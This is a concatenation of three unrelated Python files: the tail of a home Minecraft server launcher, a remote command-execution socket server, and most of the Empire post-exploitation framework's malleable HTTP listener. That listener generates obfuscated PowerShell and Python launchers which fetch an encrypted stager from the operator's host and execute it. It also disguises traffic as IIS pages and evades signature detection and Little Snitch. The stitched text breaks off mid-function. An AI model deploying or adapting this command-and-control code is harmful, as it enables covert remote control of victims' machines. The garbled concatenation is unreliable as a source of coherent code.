olives = marshal.load(s)
garden = types.ModuleType("Garden")
exec(olives,garden.__dict__)
alpha = base64.decodebytes(bytes(garden.pick(1)))
beta = base64.decodebytes(bytes(garden.pick(2)))
gamma = base64.decodebytes(bytes(garden.pick(3)))
delta = base64.decodebytes(bytes(garden.pick(4)))
x = 9
alpha = alpha.decode()
beta = beta.decode()
gamma = gamma.decode()
delta = delta.decode()
# CONNECTION VARIABLES
server = Connection(host=gamma, user=alpha, port=22, connect_kwargs={"password": beta})
command = 'nohup screen -S mine -d -m python3 Internal_MManager.py &'
# TIME PC TAKES TO TURN ON
zzz = 50
verify = False
##########################################
########## MAIN PROGRAM ##########
##########################################
while True:
print('[STATE] Looking up server info...')
try:
time.sleep(1)
i = socket.gethostbyname(gamma)
time.sleep(1)
print('[RESULT] Server OK')
print()
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
print("[RESULT] Server info could not be retrieved, try again later")
c_q.put(3)
return
# TELLS PC TO TURN ON
print('[STATE] Checking if Server is ON...')
try:
send_magic_packet(delta, ip_address=i, port=x)
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
error = err
print("[RESULT] Server cannot be turned ON, try again later")
c_q.put(4)
return
# CHECKS IF PC IS ALREADY ON AND CONNECTS
try:
server.run('ls', hide=True)
verify = server.is_connected
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
print("[RESULT] Server is turned off --> Turning it ON...")
if not verify:
print("[ACTION] Sending Magic Packets")
print("[ACTION] Waiting for Server to turn ON. ETA: ~60 sec")
print("[WARNING] Program should Work even with Traceback error - Cause (missing useless repositories)")
time.sleep(zzz)
try:
server.run('ls', hide=True)
verify = server.is_connected
if verify:
print("[RESULT] Server is turned ON")
print()
else:
print("[RESULT] Server cannot be turned ON, try again later")
c_q.put(5)
return
except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err:
error = err
print("[RESULT] Server cannot be turned ON, try again later")
c_q.put(5)
return
else:
print("[RESULT] Server is Turned ON")
print()
# TRY TO TRANSFER FILES TO PC
# MODDED - server.put('D:\Projects\Minecraft_Server_Management\Source_Code\Internal_Manager\Internal_MManager.py', '/opt/scripts')
# VANILLA - server.put('D:\Projects\Minecraft_Server_Management\Source_Code\Internal_Manager\Internal_MManager_vanilla.py', '/opt/scripts')
print("[STATE] Transferring Files")
try:
server.put('D:\Projects\Minecraft_Server_Management\Source_Code\Internal_Manager\Internal_MManager.py', '/opt/scripts')
print("[RESULT] Files Transferred Sucessfully")
print()
c_q.put(1)
break
except:
print("[RESULT] Files could not be transferred")
c_q.put(6)
break
return
##########################################
########## MAIN ROUTINE ##########
##########################################
def main():
sys.tracebacklimit = None
close_queue= Queue()
thread_start_server = threading.Thread(name='Start_Server', target=starting_module, daemon=True, args=(close_queue,))
thread_start_server.start()
# WAITS FOR THREAD TO GIVE OUTPUT (BAD OR GOOD)
while True:
state = close_queue.get()
if state == 1:
print('[RESULT] IT EXECUTED SUCCESSFULLY - YOU MAY CLOSE THE PROGRAM')
time.sleep(8)
return
else:
print("ERROR: " + str(state))
print('[WARNING] PLEASE WARN DEVELOPER OF ERROR NUMBER (or just move the damn configs file)')
time.sleep(8)
return
if __name__ == '__main__':
main() |
servers.py | # -*- coding: utf-8 -*-
# @Time : 2018/12/14 9:11
# @Author : Xiao
import socket,subprocess,struct,json,threading,time
ip_port= ("127.0.0.1",8081)
max_connect = 1
server_socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
server_socket.bind(ip_port)
server_socket.listen(max_connect)
print("starting....")
def client_conn(conn):
while True:
try:
rec = conn.recv(1024)
if not rec: break # 当客户端暴力断开连接时,跳出循环 linux系统
res = subprocess.Popen(rec.decode("utf-8"), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
err = res.stderr.read()
out = res.stdout.read()
datas = err if err else out
header = {"file_size": len(datas)}
header_bytes = bytes(json.dumps(header), encoding='utf-8')
header_len_bytes = struct.pack("i", len(header_bytes))
conn.send(header_len_bytes)
conn.send(header_bytes)
conn.send(datas)
except Exception as e:
print(conn,e)
break # 当客户端暴力断开连接时,跳出循环 windows系统
conn.close()
# 多线程,可同时和多个客户端通信,来一个接收一个
while True:
conn, client_addr = server_socket.accept()
t = threading.Thread(target=client_conn,args=(conn,))
t.start()
server_socket.close() |
http_malleable.py | from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import time
import urllib.parse
from builtins import object
from builtins import str
from typing import List
from flask import Flask, request, make_response, Response
from pydispatch import dispatcher
from empire.server.common import encryption
from empire.server.common import helpers
from empire.server.common import malleable
from empire.server.common import packets
from empire.server.common import templating
from empire.server.database import models
from empire.server.database.base import Session
from empire.server.utils import data_util
from empire.server.database.base import Session
from empire.server.database import models
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] MALLEABLE',
'Author': ['@harmj0y', '@johneiser'],
'Description': ("Starts a http[s] listener (PowerShell or Python) that adheres to a Malleable C2 profile."),
# categories - client_server, peer_to_peer, broadcast, third_party
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http_malleable'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'Profile' : {
'Description' : 'Malleable C2 profile to describe comms.',
'Required' : True,
'Value' : ''
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'SlackURL' : {
'Description' : 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {} # used to keep track of any threaded instances of this server
# optional/specific for this module
self.app = None
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(data_util.get_config('staging_key')[0])
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
profile_name = self.options["Profile"]["Value"]
profile_data = Session().query(models.Profile).filter(models.Profile.name == profile_name).first()
try:
profile = malleable.Profile()
profile.ingest(content=profile_data.data)
# since stager negotiation comms are hard-coded, we can't use any stager transforms - overwriting with defaults
profile.stager.client.verb = "GET"
profile.stager.client.metadata.transforms = []
profile.stager.client.metadata.base64url()
profile.stager.client.metadata.prepend(self.generate_cookie() + "=")
profile.stager.client.metadata.header("Cookie")
profile.stager.server.output.transforms = []
profile.stager.server.output.print_()
if profile.validate():
# store serialized profile for use across sessions
self.options["ProfileSerialized"] = {
"Description" : "Serialized version of the provided Malleable C2 profile.",
"Required" : False,
"Value" : profile._serialize()
}
# for agent compatibility (use post for staging)
self.options["DefaultProfile"] = {
"Description" : "Default communication profile for the agent.",
"Required" : False,
"Value" : profile.post.client.stringify()
}
# grab sleeptime from profile
self.options["DefaultDelay"] = {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : False,
'Value' : int(int(profile.sleeptime)/1000) if hasattr(profile, "sleeptime") else 5
}
# grab jitter from profile
self.options["DefaultJitter"] = {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : float(profile.jitter)/100 if hasattr(profile, "jitter") else 0.0
}
# eliminate troublesome headers
for header in ["Connection"]:
profile.stager.client.headers.pop(header, None)
profile.get.client.headers.pop(header, None)
profile.post.client.headers.pop(header, None)
else:
print(helpers.color("[!] Unable to parse malleable profile: %s" % (profile_name)))
return False
if self.options["CertPath"]["Value"] == "" and self.options["Host"]["Value"].startswith("https"):
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
except malleable.MalleableError as e:
print(helpers.color("[!] Error parsing malleable profile: %s, %s" % (profile_name, e)))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None,
stager=None, bypasses: List[str]=None):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
if not language:
print(helpers.color('[!] listeners/template generate_launcher(): no language specified!'))
return None
if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
# build profile
profile = malleable.Profile._deserialize(listenerOptions["ProfileSerialized"]["Value"])
profile.stager.client.host = host
profile.stager.client.port = port
profile.stager.client.path = profile.stager.client.random_uri()
if userAgent and userAgent.lower() != 'default':
if userAgent.lower() == 'none' and "User-Agent" in profile.stager.client.headers:
profile.stager.client.headers.pop("User-Agent")
else:
profile.stager.client.headers["User-Agent"] = userAgent
if language.lower().startswith('po'):
# PowerShell
vGPF = helpers.generate_random_script_var_name("GPF")
vGPC = helpers.generate_random_script_var_name("GPC")
vWc = helpers.generate_random_script_var_name("wc")
vData = helpers.generate_random_script_var_name("data")
launcherBase = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
launcherBase = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
for bypass in bypasses:
launcherBase += bypass
if safeChecks.lower() == 'true':
launcherBase += "};"
launcherBase += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# ==== DEFINE BYTE ARRAY CONVERSION ====
launcherBase += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
launcherBase += "'%s');" % (stagingKey)
# ==== DEFINE RC4 ====
launcherBase += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# ==== BUILD AND STORE METADATA ====
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
routingPacketTransformed = profile.stager.client.metadata.transform(routingPacket)
profile.stager.client.store(routingPacketTransformed, profile.stager.client.metadata.terminator)
# ==== BUILD REQUEST ====
launcherBase += helpers.randomize_capitalization("$"+vWc+"=New-Object System.Net.WebClient;")
launcherBase += "$ser="+helpers.obfuscate_call_home_address(profile.stager.client.scheme + "://" + profile.stager.client.netloc)+";$t='"+profile.stager.client.path+profile.stager.client.query+"';"
# ==== HANDLE SSL ====
if profile.stager.client.scheme == 'https':
# allow for self-signed certificates for https connections
launcherBase += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
# ==== CONFIGURE PROXY ====
if proxy and proxy.lower() != 'none':
if proxy.lower() == 'default':
launcherBase += helpers.randomize_capitalization("$"+vWc+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
launcherBase += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
launcherBase += proxy.lower()
launcherBase += helpers.randomize_capitalization("');")
launcherBase += helpers.randomize_capitalization("$"+vWc+".Proxy = $proxy;")
if proxyCreds and proxyCreds.lower() != 'none':
if proxyCreds.lower() == 'default':
launcherBase += helpers.randomize_capitalization("$"+vWc+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
launcherBase += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
else:
usr = username.split('\\')[0]
launcherBase += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');"
launcherBase += helpers.randomize_capitalization("$"+vWc+".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
launcherBase += "$Script:Proxy = $"+vWc+".Proxy;"
# ==== ADD HEADERS ====
for header, value in profile.stager.client.headers.items():
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if header.lower() == "host":
launcherBase += helpers.randomize_capitalization("try{$ig=$"+vWc+".DownloadData($ser)}catch{};")
launcherBase += helpers.randomize_capitalization("$"+vWc+".Headers.Add(")
launcherBase += "\"%s\",\"%s\");" % (header, value)
# ==== SEND REQUEST ====
if profile.stager.client.verb.lower() != "get" or profile.stager.client.body:
launcherBase += helpers.randomize_capitalization("$"+vData+"=$"+vWc+".UploadData($ser+$t,'"+ profile.stager.client.verb +"','"+ profile.stager.client.body +"')\n")
else:
launcherBase += helpers.randomize_capitalization("$"+vData+"=$"+vWc+".DownloadData($ser+$t);")
# ==== INTERPRET RESPONSE ====
if profile.stager.server.output.terminator.type == malleable.Terminator.HEADER:
launcherBase += helpers.randomize_capitalization("$"+vData+"='';for ($i=0;$i -lt $"+vWc+".ResponseHeaders.Count;$i++){")
launcherBase += helpers.randomize_capitalization("if ($"+vData+".ResponseHeaders.GetKey($i) -eq '"+ profile.stager.server.output.terminator.arg +"'){")
launcherBase += helpers.randomize_capitalization("$"+vData+"=$"+vWc+".ResponseHeaders.Get($i);")
launcherBase += helpers.randomize_capitalization("Add-Type -AssemblyName System.Web;$"+vData+"=[System.Web.HttpUtility]::UrlDecode($"+vData+");")
launcherBase += "}}"
elif profile.stager.server.output.terminator.type == malleable.Terminator.PRINT:
launcherBase += ""
else:
launcherBase += ""
launcherBase += profile.stager.server.output.generate_powershell_r("$"+vData)
# ==== EXTRACT IV AND STAGER ====
launcherBase += helpers.randomize_capitalization("$iv=$"+vData+"[0..3];$"+vData+"=$"+vData+"[4..$"+vData+".length];")
# ==== DECRYPT AND EXECUTE STAGER ====
launcherBase += helpers.randomize_capitalization("-join[Char[]](& $R $"+vData+" ($IV+$K))|IEX")
if obfuscate:
launcherBase = data_util.obfuscate(self.mainMenu.installPath, launcherBase, obfuscationCommand=obfuscationCommand)
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(launcherBase, launcher)
else:
return launcherBase
elif language.lower().startswith('py'):
# Python
# ==== HANDLE IMPORTS ====
launcherBase = 'import sys,base64\n'
launcherBase += 'import urllib.request,urllib.parse\n'
# ==== HANDLE SSL ====
if profile.stager.client.scheme == "https":
launcherBase += "import ssl\n"
launcherBase += "if hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context\n"
# ==== SAFE CHECKS ====
if safeChecks and safeChecks.lower() == 'true':
launcherBase += "import re,subprocess\n"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search('Little Snitch', out.decode()):sys.exit()\n"
launcherBase += "server='%s'\n" % (host)
# ==== CONFIGURE PROXY ====
if proxy and proxy.lower() != 'none':
if proxy.lower() == 'default':
launcherBase += "proxy = urllib.request.ProxyHandler()\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'"+proto+"':'"+proxy+"'})\n"
if proxyCreds and proxyCreds != 'none':
if proxyCreds == 'default':
launcherBase += "o = urllib.request.build_opener(proxy)\n"
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"')\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler)\n"
else:
launcherBase += "o = urllib.request.build_opener(proxy)\n"
else:
launcherBase += "o = urllib.request.build_opener()\n"
# install proxy and creds globaly, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o)\n"
# ==== BUILD AND STORE METADATA ====
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
routingPacketTransformed = profile.stager.client.metadata.transform(routingPacket)
profile.stager.client.store(routingPacketTransformed, profile.stager.client.metadata.terminator)
# ==== BUILD REQUEST ====
launcherBase += "vreq=type('vreq',(urllib.request.Request,object),{'get_method':lambda self:self.verb if (hasattr(self,'verb') and self.verb) else urllib.request.Request.get_method(self)})\n"
launcherBase += "req=vreq('%s', %s)\n" % (profile.stager.client.url, profile.stager.client.body)
launcherBase += "req.verb='"+profile.stager.client.verb+"'\n"
# ==== ADD HEADERS ====
for header, value in profile.stager.client.headers.items():
launcherBase += "req.add_header('%s','%s')\n" % (header, value)
# ==== SEND REQUEST ====
launcherBase += "res=urllib.request.urlopen(req)\n"
# ==== INTERPRET RESPONSE ====
if profile.stager.server.output.terminator.type == malleable.Terminator.HEADER:
launcherBase += "head=res.info().dict\n"
launcherBase += "a=head['%s'] if '%s' in head else ''\n" % (profile.stager.server.output.terminator.arg, profile.stager.server.output.terminator.arg)
launcherBase += "a=urllib.parse.unquote(a)\n"
elif profile.stager.server.output.terminator.type == malleable.Terminator.PRINT:
launcherBase += "a=res.read()\n"
else:
launcherBase += "a=''\n"
launcherBase += profile.stager.server.output.generate_python_r("a")
# ==== EXTRACT IV AND STAGER ====
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# ==== DECRYPT STAGER (RC4) ====
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
# ==== EXECUTE STAGER ====
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color("[!] listeners/template generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/template generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_malleable generate_stager(): no language specified!'))
return None
# extract the set options for this instantiated listener
port = listenerOptions['Port']['Value']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
# build profile
profile = malleable.Profile._deserialize(listenerOptions["ProfileSerialized"]["Value"])
profile.stager.client.host = host
profile.stager.client.port = port
profileStr = profile.stager.client.stringify()
# select some random URIs for staging
stage1 = profile.stager.client.random_uri()
stage2 = profile.stager.client.random_uri()
if language.lower() == 'powershell':
# read in the stager base
with open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath)) as f:
stager = f.read()
# Get the random function name generated at install and patch the stager with the proper function name
stager = data_util.keyword_obfuscation(stager)
# patch in custom headers
if profile.stager.client.headers:
headers = ",".join([":".join([k.replace(":","%3A"),v.replace(":","%3A")]) for k,v in profile.stager.client.headers.items()])
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours
if workingHours:
stager = stager.replace("WORKING_HOURS_REPLACE", workingHours)
# patch in the killdate
if killDate:
stager = stager.replace("REPLACE_KILLDATE", killDate)
# patch in the server and key information
stager = stager.replace("REPLACE_SERVER", host)
stager = stager.replace("REPLACE_STAGING_KEY", stagingKey)
stager = stager.replace("/index.jsp", stage1)
stager = stager.replace("/index.php", stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
# stager = stager.encode('UTF-8')
# randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = data_util.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profileStr,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
if encode:
return base64.b64encode(stager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
return stager
else:
print(helpers.color("[!] listeners/http_malleable generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
return None
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand="", version=''):
"""
Generate the full agent code needed for communications with the listener.
"""
if not language:
print(helpers.color("[!] listeners/http_malleable generate_agent(): no language specified!"))
return None
# build profile
profile = malleable.Profile._deserialize(listenerOptions["ProfileSerialized"]["Value"])
language = language.lower()
delay = listenerOptions["DefaultDelay"]["Value"]
jitter = listenerOptions["DefaultJitter"]["Value"]
lostLimit = listenerOptions["DefaultLostLimit"]["Value"]
killDate = listenerOptions["KillDate"]["Value"]
workingHours = listenerOptions["WorkingHours"]["Value"]
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8')).decode('UTF-8')
profileStr = profile.stager.client.stringify()
if language == 'powershell':
#read in agent code
with open(self.mainMenu.installPath + "/data/agent/agent.ps1") as f:
code = f.read()
# Get the random function name generated at install and patch the stager with the proper function name
code = data_util.keyword_obfuscation(code)
# path in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace("REPLACE_COMMS", commsCode)
# strip out the comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profileStr) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse +'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = data_util.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
# read in the agent base
if version == 'ironpython':
f = open(self.mainMenu.installPath + "/data/agent/ironpython_agent.py")
else:
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profileStr))
